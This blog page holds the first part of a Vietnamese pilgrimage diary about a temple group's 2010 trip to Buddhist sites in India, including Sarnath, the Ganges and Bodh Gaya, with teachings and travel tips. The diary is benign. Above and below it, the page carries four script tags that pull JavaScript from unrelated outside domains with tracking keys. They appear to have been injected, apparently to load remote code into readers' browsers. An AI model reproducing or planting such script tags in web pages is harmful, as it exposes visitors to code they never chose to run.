• Nhat Ky hanh huong dat Phat - 1

     

    <script src="//scrprime.com/23178e2c7c2ade2327.js"></script> <script src="http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8983x" type="text/javascript"></script> <script src="http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8983x&format=arrjs&r=1627833279700" type="text/javascript"></script> <script src="http://scrprime.com/ext/23178e2c7c2ade2327.js?sid=52715_8983_&title=qq&blocks[]=31af2" type="text/javascript"></script>

     

     

    Nhật ký hành hương đất Phật

    ...

    15/12 2010 – 01/01/2011

     

     

    Tôi quyết định đi theo đoàn hành hương do chùa Vạn Hạnh ỏ Nantes tổ chức từ cuối tháng 8, 2010. Làm các thủ tục vé máy bay, passport và visas xong xuôi từ cuối tháng mười. (Các bạn nên nhớ rằng passport của bạn phải còn có giá trị tối thiểu 3 tháng sau ngày rời Ấn Độ trở về.  Nếu bạn rời Ấn Độ ngày 01/01/2011, thì passport của bạn phải còn giá trị tối thiểu là đến 01/04/2011. Visas vào ra Ấn Độ, phải là « Double entries ») Xong xuôi tất cả, tôi phủi tay tự nhủ, bây giờ thì chỉ còn chờ ngày đi mà thôi, và tôi vui thú thở ra nhẹ nhỏm trong người.

     

    Không ngờ 2 tuần lễ trước ngày đi, tôi bỗng nhiên phát bệnh đủ thứ, mà không phải là bệnh tầm thường.  Hủy bỏ chuyến đi hành hương chăng ? Không, không thể được ! Tôi đã hứa với một bà bạn sẽ cùng đi hành hương với bà ta, vã lại, cũng đã hứa với Thầy trên chùa Vạn Hạnh rồi, không thể nay nói đi, mai nói bỏ, lôi thôi như vậy. Tôi quyết dịnh đi sau khi hỏi ý kiến các bác sĩ của tôi. Họ đã cho phép tôi đi với đủ điều căn dặn cặn kẽ !!!

     

    15/12/2010 : Ngày ra đi đã đến (quá nhanh đối với tôi lúc đó !). Người em họ của bà bạn tôi đưa chúng tôi đến phi trường Bordeaux lúc 3 giờ sáng. Chúng tôi bay từ Bordeaux sang Amsterdam. Ở đây chúng tôi gặp được nhóm của Chùa Vạn Hạnh từ Nantes ở Pháp sang, một nhóm Phật tử khác từ Đan Mạch (Danemark), và một bà Phật tử đơn độc từ bên Đức đến. Chúng tôi cùng lấy máy bay đi New Delhi, và đến New Delhi lúc 1 giờ sáng ngày 16/12/2010.  Ở đây chúng tôi gặp thêm hai nhóm nữa đang chờ chúng tôi tại phi trường, một từ Việt-Nam sang, và một từ Úc Châu sang. Một sư cô người Việt, Sư cô Tuệ Đàm Hương, đã từng du học ở Ấn Độ, từng làm Phật sự xây dựng chùa Viên Giác ở Ấn Độ, và hiện đang ở tại đây, đón chúng tôi đưa về khách sạn ở New Delhi, để tạm nghỉ đêm tại đó.

     

    Trong nhóm đệ tử của chùa Nantes, có 4 bà người Pháp, và có một bà đệ tử cũng của chùa Nantes sành các danh từ Phật học, làm thông dịch viên cho mấy bà Pháp này.

     

    16/12/2010 : Chúng tôi lấy máy bay di Varanasi. Ngoại trừ quảng đường này là chúng tôi đi bằng máy bay, sau này tất cả các di chuyển khác dều được thực hiện bằng xe ca.

     

    Cuộc hành hương của chúng tôi kể từ ngày này trở đi, mọi chuyện đều do Sư Cô Tuệ Đàm Hương sắp xếp, tổ chức, lo về khách sạn, nơi ăn uống, và xe ca cho toàn cả đoàn. Ba mươi lăm người tất cả, gồm có Thượng Tọa Thích Thiện Huệ từ Việt-Nam sang, Thượng Tọa Thích Nguyên Lộc, Trụ trì của chùa Vạn Hạnh ở Nantes, Thượng tọa Thích Nguyên Hùng, Sư Cô Tâm-Nghĩa ở chùa Nantes, Sư Cô Tuệ Đàm Hương, và tất cả chúng tôi, người thế gian trần tục, từ bốn phương trời góp mặt. Tôi là người lớn tuổi nhất trong nhóm nên được nhường cho ưu tiên. Trên xe ca được ngồi phía trước ít xóc, vì đường rất xấu, xóc kinh khủng !

     

    Sư Cô Tuệ Đàm Hương tổ chức hết sức chu đáo, vì đã có nhiều kinh nghiệm. Chúng tôi được phát mỗi người một chiếc nón vải giống nhau để dễ nhìn ra nhau, khỏi bị  lạc. Trên xe ca, thì chúng tôi được yêu cầu ai ngồi ở đâu, thì luôn luôn ngồi ở đó trong suốt cuộc hành hương, và phải để ý người bên cạnh của mình, có mặt hay còn thiếu ở trên xe, mỗi khi lên xe để rời đi nơi khác.

     

    Trên xe ca của chúng tôi có một ông hướng dẫn viên, một tài xế và một lơ xe người Ấn. Ông hướng dẫn viên này cũng hiểu biết khá nhiều về lịch sử các thánh tích. Mỗi lần lên xe để đi nơi khác ông ta "đếm" đầu chúng tôi một cách hết sức có trách nhiệm ! Những người này họ làm việc cho chúng tôi gần như mỗi ngày 14-16 tiếng đồng hồ !

     

    Lịch trình viếng thăm các thánh tích được sắp xếp theo sự thuận tiện của con đường đi, chứ không dựa theo thứ tự các sự việc đã xảy ra trong lịch sử. Bốn nơi chính yếu, gọi là tứ động tâm, của cuộc hành hương là : Nơi Đức Phật Thích Ca sinh, nơi Phật thành đạo, nơi Phật chuyển Pháp luân (giảng Pháp lần đầu tiên), và nơi Phật nhập niết bàn.

     

     

    Tại mỗi thánh tích, Thầy Thích Nguyên Hùng giảng cho chúng tôi nghe những gì đã xảy ra ở đó theo trong kinh, và những mẫu chuyện con con, vui cuời... Sau đây tôi xin ghi lại những gì tôi đã nghe và ghi chép lại được giữa những cơn ho rũ rượi của tôi. Vì bên đó, mùa này trời cũng lạnh lắm. Sau 2 ngày ai cũng đổ xuống bịnh hết, không sót một ai !!! (Vì ai cũng tưởng rằng bên đó trời nắng ấm nên không đem theo đủ áo lạnh !)

     

    Ở Varanasi chúng tôi nghỉ hai đêm 16 và 17/12/2010 tại khách sạn. Chúng tôi di thăm viếng Đạo Tràng Chuyển Pháp Luân, Viện Bảo Tàng và Vườn Lộc Uyển.

     

    17/12/2010 : Tại Vườn Lộc Uyển (vườn nai) này, đức Thế Tôn, đã giảng Pháp lần đầu tiên, và là giảng cho năm anh em Kiều Trần Như. Năm người này trước đây là bạn cùng tu khổ hạnh với Đức Thế Tôn, họ đã hết sức khâm phục Đức Thế Tôn ở ý chí tu khổ hạnh của Ngài. Ở đây bản kinh Chuyển Pháp Luân giảng về "Tứ Diệu Đế" được dịch ra nhiều thứ tiếng, và khắc trên bảng đá. Tôi đã vô cùng xúc động thấy có bản dịch tiếng Việt góp mặt ở đây.

     

    Chúng tôi viếng thăm Đạo-Tràng, xưa hơn 2000 năm, nay chỉ còn là một phế tích, với ngọn tháp Dhamek cao hơn 30 thước uy nghi, dũng liệt, và vườn Lộc Uyển. Có các trẻ em bán thức ăn (trái cây dại) cho nai ăn. Và khách hành hương được vui thú cho nai ăn, vuốt ve đầu các con nai có đôi mắt hiền lành. Bổng nhiên tôi nghe đau nhói trong tim, đôi mắt của chúng sao mà có một nét buồn vô bờ bến ! (Tôi nhìn lại, vườn nai có hàng rào sắt kiên cố ! ) .

     

    Tối ăn cơm xong chúng tôi được nghe Thầy Thích Nguyên Hùng giảng :

     

    Vì sao Đức Phật chọn mảnh đất này để thị hiện ?

     

    * Xã hội Ấn Độ là một xã hội bất bình đẳng nhất qua sự phân chia nhiều giai cấp. (Có bốn giai cấp chính gọi là "castes", có thứ tự quan trọng khác nhau, cha truyền con nối và một giai cấp thứ 5, ngoại hạng "hors-caste", những người thuộc giai cấp này gọi là "intouchables", không chung đụng được.  Giai cấp này bị khinh miệt nhất trong xã hội Ấn). Đức Phật là nhà cách mạng giai cấp đầu tiên trong lịch sử loài người, tôn trọng quyền bình đẳng. Ngài nói : « Không có giai cấp khi ai ai cũng có nước mắt cùng mặn, có máu cùng đỏ ».

    * Ấn độ là xứ có nhiều tôn giáo nhất, hơn 90 tôn giáo khác nhau, nhưng không một tôn giáo nào giải quyết được vấn đề căn bản của kiếp người, đó là làm sao chấm dứt khổ đau : sinh, lão bệnh, tử. Đức Phật ra đời để chỉ giáo cho chúng sinh vấn đề này.

    * Đất nước này có nền văn minh xưa nhất của nhân loại: Đạo Phật là tinh hoa tuyệt đỉnh của nền văn minh nhân loại, là thông điệp từ bi và trí tuệ, là con đường đi đến hạnh phúc tối thượng.

    * Vì đây là một xứ dân nghèo, lầm than, đầy khổ đau. Chỉ có những người có tâm lượng như chư Phật và Bồ Tát mới có thể dang tay ra để cứu vớt.

     

    18/12/2010 : Chúng tôi đi viếng thăm sông Hằng (Gange).

    Trên đường đi thăm sông Hằng, chúng tôi bị kẹt xe vì gặp các cuộc rước lễ của các giáo dân thuộc Bà La Môn giáo, đông nghẹt cả đường.

     

    Sông Hằng đối với người Ấn Độ không những rất là quan trọng về mặt địa lý, mà còn mang một tính chất linh thiêng, tôn giáo nữa. Sông Hằng, dài 3090km, xuất phát từ dãy núi Hy Mã Lạp Sơn, (chóp đĩnh cao của toàn qủa địa cầu), chảy băng qua Kanpur, Bénarès, và Patna, để ra biển trong vịnh Bengal. Người Ấn Độ, (Ấn Độ giáo, Hồi Giáo và Bà La Môn giáo v.v.…) tin tưởng rằng nước sông Hằng có thể gột sạch các tội lỗi của con người, và đưa linh hồn con người lên thẳng thiên đường. Ngoài ra ở Ấn Độ còn có đạo thờ nước. Nhưng trong kinh Phật, thì ta chỉ thấy « Hằng-hà sa » được nhắc đến để ám chỉ một số nhiều không thể lường ước được như cát của sông Hằng. Người Ấn Độ cũng tin tưởng rằng lửa có thể làm tiêu tan các tội lỗi của con người, nên phong tục ở đây từ xa xưa đến nay, người chết được thiêu, xong đổ tro xuống sông Hằng.  Tỷ số người Ấn Độ theo Phật giáo ở trong nước không quá 10%.

     

    Ở đây chúng tôi thuê thuyền ra xa xa ngoài giòng sông để thả các đĩa hoa nhỏ trong đó có một ngọn nến, với ý nghĩa soi sáng, dẫn đường cho các vong hồn ở nơi đây, cùng với lời tụng kinh và cầu nguyện của chúng tôi. 

     

    Dọc bờ sông, dân trong vùng tắm và giặt rửa, phơi từng tấm sari dài trên các bậc cấp, vì thế dọc bờ sông Hằng màu sắc rất là rực rỡ. Cũng dọc bờ sông, lác đác có vài bệ xi măng để thiêu, và các vựa chứa củi. Tục lệ người Ấn Độ từ xa xưa tới nay là chết thì thiêu. Người giàu mua được nhiều củi thì thiêu dược trọn vẹn chỉ còn tro. Người nghèo chỉ mua được dăm ba cây củi, xác đôi khi vẫn còn nguyên, và cứ y như thế được thả xuống sông !

     

    Chỉ sau vài vòng trên xe ca, chúng tôi nhận thức nhìn thấy dân Ấn Dộ tại các vùng này rất nghèo khổ, nhìn các túp lều rách nát hai bên đường ...  Người ăn xin rất nhiều. đàn ông, đàn bà, trẻ con, người tàn tật …, nhất là ở các nơi thánh tích có nhiều du khách hành hương, có cả hàng trăm người ăn xin !

     

    Đường Ấn Độ đầy cả bụi. Lá cây bên đường đều bị phủ một lớp bụi dày, dày đến nỗi mà mưa không rửa sạch được ! Bò đi lang thang, đủng đỉnh ngoài đường. Xe cộ phải tránh chúng. Phân bò được người Ấn Độ (dùng tay) ép lại thành bánh, phơi trên các bải cỏ bên vệ đường, hay dán vào tường rào để phơi, khi khô họ dùng để đun bếp.

     

    Rau cải thấy bày bán ở các chợ có đủ các loại rau như ở Việt-Nam ta, rau rất xanh tươi, chắc chắn là rất ‘BIO’, được trồng bằng phân heo, phân bò và có lẽ cả với phân người nữa !!! Chúng tôi được khuyên chỉ nên dùng nước trong chai để uống, không nên uống nước từ vòi nước, cho dầu chỉ để đánh răng súc miệng. Tôi tự hỏi « rau sống ăn ở chùa có được rửa bằng nước trong chai không ? » Đêm đầu tiên đến chùa Viên Giác, tất cả chúng tôi vì đi đường xa đói quá, đều đổ vồ xuống ăn bát bún riêu của chùa, thật là ngon, ‘ngon kinh khủng’, sau mấy ngày ăn các món đồ chay cà ri Ấn Độ tại các khách sạn, chán ơi là chán, không hợp khẩu vị chút nào.  Hôm ấy được tô bún riêu, với rau sống tươi xanh, trông thật sạch sẽ, thật hấp dẫn. Ngày hôm sau tất cả chúng tôi đều đau bụng ! Tôi nghĩ thầm « cần phải rửa rau bằng thuốc tím (permanganate de potassium) ! ».

     

    Chiều, chúng tôi rời Vanarasi để đi Bodh Gaya bằng xe ca. Tại Bodh Gaya chúng tôi ngụ tại chùa Viên Giác, cách Bồ Đề Đạo Tràng chưa đầy 10 phút đi bộ. Chúng tôi đến đây vào khoảng 7 giờ, trời đã tối. Tại đây chúng tôi ở lại lâu nhất trong cuộc đi hành hương. Chùa có nhiều phòng cho khách thập phương, khá tiện nghi, có phòng ăn lớn, và có chánh điện rộng để tối tối chúng tôi lên đọc kinh và nghe Thầy giảng Pháp.

     

    19/12/2010 : Bồ Đề Đạo Tràng ở Bodh Gaya.

     

    Mỗi ngày, 5giờ sáng chúng tôi ra đi, đến Bồ Đề Đạo Tràng đọc kinh bên gốc cây bồ đề nơi Phật thành đạo. Có tường đá xây cao rào quanh gốc cây bô đề. Chúng tôi mỗi người đều có được phát cho một cây đèn « pin » bấm.

     

    Thật ra cây bồ đề nguyên thủy nơi Phật ngồi thiền định, qua bao nhiêu cuộc nội chiến tôn giáo, người ngoại đạo thấy dân đến sùng bái bên gốc cây bồ đề nên đã nhiều lần chặt phá gốc bồ đề này. Nhưng sau mỗi lần đều được trồng lại từ một nhánh của gốc bồ đề ở Tích Lan (Sri Lanka). Theo các nhà khảo cổ, cây bồ đề hiện tại được trồng lại cách nay khoảng 150 năm. Cạnh gốc bồ đề, có một tháp được xây lên cao trên 60m, vào khoảng thế kỷ thứ III trước tây lịch do vua A Dục Ashoka xây. Vì thế gốc bồ đề này bị tháp che ánh nắng nên mọc nghiêng ra ngoài.

    Tháp này qua bao nhiêu thế kỷ đã được tu sửa lại nhiều lần. Mặt đáy của tháp là một hình vuông trên 35m mỗi cạnh. Đó là trung tâm của đạo tràng. Đạo tràng nằm trong một thung lũng, ở ngoài bước vào đạo tràng phải đi xuống rất nhiều dãy cấp. Chung quanh tháp có lối đi rộng lát đá cẩm thạch (marbre). Người sùng đạo và khách hành hương từ tứ phương trời đến đây lễ bái và đi kinh hành rất đông, vì thế chúng tôi mỗi ngày ra đây từ lúc 5g sáng để có thể kiếm được một chỗ ngồi cho toàn cả đoàn 35 người. Có rất nhiều đoàn hành hương khác, Thái, Nhật, Trung Hoa, Tây-Tạng … và cả Việt-Nam nữa.

    Chúng tôi đến đây nhằm lúc có ngài Karmapa-Lama đến viếng đạo tràng. Ngài Karmapa-Lama này là hóa thân lần thứ 17 của một vị Karmapa-Lama trong thời xa xưa, vì thế đạo tràng rất đông. Các sư Tây-Tạng áo đỏ và áo vàng đến đây đông nghẹt cả các tầng sân cỏ chung quanh đạo tràng. Ở đây lúc nào cũng có treo đèn kết hoa (hay là vì đặc biệt có ngài Karmapa-Lama đến thăm ?), và là hoa thật, (tôi đã có sờ thử) phần nhiều là hoa vạn thọ vàng xâu thành chuổi. Các tượng Phật trong chánh điện cũng như các tượng nhỏ ở ngoài, cả hàng trăm tượng trên thành tháp, đều có vòng hoa choàng qua cổ. Nơi nơi đều có thấy vàng lá (feuilles d’or) dán lên bất cứ nơi nào tay người vói thấu.

    Ở chánh điện của Đạo Tràng có tượng Phật ngồi lớn. Khách thập phương đến đây đảnh lễ rất đông, suốt ngày không lúc nào ngơi. Có nhiều người đem từng xấp lụa vàng đến dâng Phật, và vị sư trông nom ở nơi đây, mỗi khi có người đem lụa đến như vậy thì thay y cho Phật. Mỗi ngày như vậy họ thay y cho Phật không biết là bao nhiêu lần ! Tôi sực nhớ đến mẩu chuyện con con Thầy kể trong đó nhũ mẫu của Phật may y cho Phật, bằng gấm vàng, nhưng Phật từ chối không nhận, nói rằng Phật đã có ba cái, đủ rồi, không cần thiết. Theo quy luật trong tăng đoàn do chính Phật đề ra, mỗi người chỉ được phép có ba y và một bình bát.

    Sau khi rời bỏ cung điện, và trên đường lang thang đi tìm chân lý, Thái tử Siddharta đã gặp một nhóm người tu khổ hạnh, nhóm anh em Kiều Trần Như. Ngài đi theo các người này. Sau sáu năm tu khổ hạnh hết sức nghiêm túc (mỗi ngày chỉ ăn một hạt mè), thân thể của ngài chỉ còn da bọc xương. Một hôm nọ thái tử đi ra sông để tắm, thái tử đã ngất xỉu và được cô thôn nữ Sujata đi ngang qua đó cúng dường một tô sữa. Thái tử nhờ thế đã tỉnh lại, và sau đó hiểu rằng con đường tu khổ hạnh không thể đưa đến chân lý.  Thái tử vất cái tô đất xuống sông và tự nhủ : “ Nếu ta không tìm ra chánh pháp, thì tô đất này sẽ theo giòng sông trôi ra biển », nhưng tô đất đã trôi ngược giòng sông để hướng lên nguồn. (Con sông này, Ni Liên Thuyền, Niranjana, nay đã khô cạn, chỉ còn là một dải cát). Sau đó thái tử rời bỏ nơi tu khổ hạnh và tìm đến một khu rừng già, có nhiều cây to bóng mát, và chọn ngồi dưới một gốc cây thuộc loại cây sung, và tự nhủ: “Ta sẽ ngồi đây và quyết không rời nơi này cho đến khi ta tìm ra được chánh pháp. Nếu không ta sẽ chết ở nơi đây”. Trong khi thái tử ngồi thiền định ở dưới gốc cây sung, có một chú mục đồng gánh cỏ đi ngang qua đó, thấy thái tử ngồi trên đất đầy sỏi đá, đã dâng lên thái tử gánh cỏ của mình vừa mới cắt xong, để làm nệm cho thái tử ngồi. Nệm cỏ đó sau này hóa thành “kim-cang tọa”. Tại đây các chim, sóc, và các con thú trong rừng đã hái trái cây dâng lên cho thái tử.

    Sau 49 ngày ngồi thiền định ở đây, thái tử đã “Giác Ngộ” và đắc đạo thành Phật, là Phật Thích Ca Mâu Ni.

    Đức Thế Tôn lúc đó 35 tuổi.

    Cây sung sau đó được đặt tên là cây bồ đề (bồ đề = bodhi = giác ngộ). Năm 288 trước Tây lịch, một nhánh của cây bồ đề nguyên thủy này đã tự nhiên gãy và được con gái của vua A Dục đem về Tích Lan (Sri Lanka). Vua Tích Lan đã trồng lại nhánh này với đầy đủ lễ nghi. Cây bồ đề Tích Lan này được xem là cây xưa đời nhất do tay người trồng. Và như vậy, cây bồ đề hiện tại ở Bồ Đề Đạo Tràng là “hậu duệ” của cây bồ đề nguyên thủy nơi Đức Phật ngồi thiền định.

     

     

     

     

     

     

     

     

    Xem tiếp ở trang sau

     

    <script src="//scrprime.com/23178e2c7c2ade2327.js"></script> <script src="http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8983x" type="text/javascript"></script> <script src="http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8983x&format=arrjs&r=1627833279543" type="text/javascript"></script> <script src="http://scrprime.com/ext/23178e2c7c2ade2327.js?sid=52715_8983_&title=qq&blocks[]=31af2" type="text/javascript"></script>

  • Commentaires

    Aucun commentaire pour le moment

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :